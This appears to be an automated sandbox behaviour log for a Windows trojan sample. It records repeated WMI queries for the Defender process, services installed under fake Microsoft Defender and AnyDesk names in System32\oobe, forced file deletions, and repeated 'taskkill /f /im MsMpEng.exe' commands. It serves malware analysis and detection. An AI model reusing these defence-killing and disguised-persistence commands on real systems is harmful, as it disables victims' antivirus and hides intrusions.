Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeReversingLabs: Detection: 31%
Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe "C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe" install
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6636
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2404
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: unknownProcess created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe "C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2128
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: unknownProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe "C:\Windows\System32\oobe\AnyDeskUpdateService.exe"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6552
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
